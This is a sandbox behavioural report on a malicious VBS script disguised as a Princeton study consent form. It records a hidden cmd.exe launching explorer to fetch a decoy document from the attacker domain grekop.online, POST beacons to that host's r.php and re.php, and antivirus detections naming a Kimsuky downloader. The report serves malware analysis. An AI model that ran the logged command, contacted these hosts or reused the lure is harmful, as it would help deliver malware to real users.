Consent Form_Princeton Study.vbs

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 17, 2023, 10:37 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 17, 2023, 10:37 a.m.			0	0

Performs some HTTP requests (1 event)

request

GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c explorer "https://grekop.online/brad/share.docx"
cmdline	cmd.exe /c explorer "https://grekop.online/brad/share.docx"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 17, 2023, 10:37 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c explorer "https://grekop.online/brad/share.docx" filepath: cmd.exe	1	1	0
ShellExecuteExW Aug. 17, 2023, 10:37 a.m.	show_type: 0 filepath_r: ? parameters: v??X???? filepath: ?		0	0

Communicates with host for which no DNS query was performed (1 event)

host	117.18.232.200

Wscript.exe initiated network communications indicative of a script based payload download (4 events)

Time & API	Arguments	Status	Return	Repeated
InternetCrackUrlW Aug. 17, 2023, 10:37 a.m.	url: https://grekop.online/brad/r.php flags: 0	1	1	0
HttpOpenRequestW Aug. 17, 2023, 10:37 a.m.	connect_handle: 0x00cc0008 http_version: flags: 81788928 http_method: POST referer: path: /brad/r.php	1	13369356	0
InternetCrackUrlW Aug. 17, 2023, 10:37 a.m.	url: https://grekop.online/brad/re.php flags: 0	1	1	0
HttpOpenRequestW Aug. 17, 2023, 10:37 a.m.	connect_handle: 0x00cc0008 http_version: flags: 81788928 http_method: POST referer: path: /brad/re.php	1	13369356	0

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

ALYac	VB:Trojan.Valyria.8377
Symantec	ISB.Downloader!gen407
ESET-NOD32	VBS/Kimsuky.Y
BitDefender	VB:Trojan.Valyria.8377
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
MicroWorld-eScan	VB:Trojan.Valyria.8377
Emsisoft	VB:Trojan.Valyria.8377 (B)
VIPRE	VB:Trojan.Valyria.8377
McAfee-GW-Edition	BehavesLike.VBS.Dropper.nv
FireEye	VB:Trojan.Valyria.8377
GData	VB:Trojan.Valyria.8377
Arcabit	VB:Trojan.Valyria.D20B9
MAX	malware (ai score=83)

wscript.exe-based dropper (JScript, VBS) (2 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (24 events)

Time & API	Arguments	Status	Return	Repeated
InternetCrackUrlW Aug. 17, 2023, 10:37 a.m.	url: https://grekop.online/brad/r.php flags: 0	1	1	0
HttpOpenRequestW Aug. 17, 2023, 10:37 a.m.	connect_handle: 0x00cc0008 http_version: flags: 81788928 http_method: POST referer: path: /brad/r.php	1	13369356	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer:  p l dÝyåkNhfMŠ2”o#G0n<'3åä’SSÚú¶/5 ÀÀÀ À 28 +ÿ  grekop.online  socket: 1152 sent: 117	1	117	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer:  p l dÝyå^{ÖbžÉ¸áþm®Ý›ÎÁ†ä3ÀÔ& ÁE‘/5 ÀÀÀ À 28 +ÿ  grekop.online  socket: 1168 sent: 117	1	117	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: 5 1dÝyæÍüj$òæÿ•`ŽŠVmdƒñKÇ´7\†–÷Ñ  ÿ socket: 1168 sent: 58	1	58	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
InternetCrackUrlW Aug. 17, 2023, 10:37 a.m.	url: https://grekop.online/brad/re.php flags: 0	1	1	0
HttpOpenRequestW Aug. 17, 2023, 10:37 a.m.	connect_handle: 0x00cc0008 http_version: flags: 81788928 http_method: POST referer: path: /brad/re.php	1	13369356	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer:  p l dÝyæýþћöƜ%ö/Ʀü=n)Ö *&År/5 ÀÀÀ À 28 +ÿ  grekop.online  socket: 1284 sent: 117	1	117	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer:  p l dÝyçŒ{ʺH.+yŠ<çހ%‡U!EsÚ7ªÇܬy8/5 ÀÀÀ À 28 +ÿ  grekop.online  socket: 1284 sent: 117	1	117	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: 5 1dÝyç­Î¸îUÿüöõjòJ«ËmVèŒ÷ËNÒ˜+3º"  ÿ socket: 1284 sent: 58	1	58	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0
send Aug. 17, 2023, 10:37 a.m.	buffer: ! socket: 1076 sent: 1	1	1	0

One or more non-whitelisted processes were created (3 events)

parent_process	wscript.exe				martian_process	? v??X????
parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c explorer "https://grekop.online/brad/share.docx"
parent_process	wscript.exe				martian_process	cmd.exe /c explorer "https://grekop.online/brad/share.docx"

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 17, 2023, 10:37 a.m.	thread_identifier: 156 thread_handle: 0x00000084 process_identifier: 200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\explorer.exe track: 1 command_line: explorer "https://grekop.online/brad/share.docx" filepath_r: C:\Windows\system32\explorer.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe